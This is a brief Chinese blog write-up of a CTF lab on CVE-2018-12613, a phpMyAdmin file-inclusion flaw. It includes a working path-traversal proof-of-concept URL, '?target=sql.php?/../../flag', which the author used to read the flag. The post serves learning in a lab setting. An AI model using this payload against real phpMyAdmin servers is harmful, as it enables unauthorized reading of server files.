春秋云境CVE-2018-12613

Chockmans2026-04-07 11:56

1.阅读靶场介绍

index.php中存在一处文件包含逻辑

可以理解为对url做处理

能想到的就是../../../../../flag

2.启动靶场

如上图所示

看到这个界面我想到的就是select flag from flag出来

但是本博主没有找到哟

期待各位大神的评论

3.poc

这里博主是通过这个处理过的url夺旗的

如下所示

url在这里哟

各位可以参考参考哟

复制代码 
https://eci-2ze8e04kno5d57s1geyi.cloudeci1.ichunqiu.com:80/?target=sql.php?/../../../../../../../../flag

到此,相信各位都完成夺旗了

感谢您宝贵的时间

相关推荐
galaxylove10 小时前
Gartner发布创新洞察:AI SOC智能体加速通信运营商安全运营转型
大数据·人工智能·安全
lcreek10 小时前
SQL 注入实战:DVWA High 完整测试指南
网络安全·sql注入
●VON12 小时前
AtomGit Flutter鸿蒙客户端:数据模型
android·服务器·安全·flutter·harmonyos·鸿蒙
不灭锦鲤13 小时前
网络安全第120天
安全·web安全
德迅--文琪13 小时前
游戏盾筑牢网络游戏防攻击安全防线
安全·游戏
NineData13 小时前
SQL 都在等锁时,ChatDBA 先帮 MySQL 找到谁在挡路
数据库·人工智能·sql·mysql·安全·数据复制·数据迁移工具
超级无敌zhq13 小时前
后渗透痕迹清理:攻防对抗中的隐身术
网络·数据库·网络安全
打码人的日常分享13 小时前
数据安全,网络安全风险评估报告(Word)
安全·web安全
m0_7381207214 小时前
Docker 环境下 Vulfocus 靶场搭建全流程(附镜像源问题解决方案)
运维·服务器·网络·安全·docker·容器
芯盾时代14 小时前
企业建立安全防线治理失控的Agent
大数据·人工智能·安全
热门推荐
01《置身钉内》原文-可播放阅读02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04Codex 下载安装指南:Windows 和 macOS 官方版下载052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08CC-Switch 下载、安装与使用配置指南【2026.5.29】09AI科技热点日报 | 2026年6月1日10CC-Switch & Claude 基于 Linux 服务器安装使用指南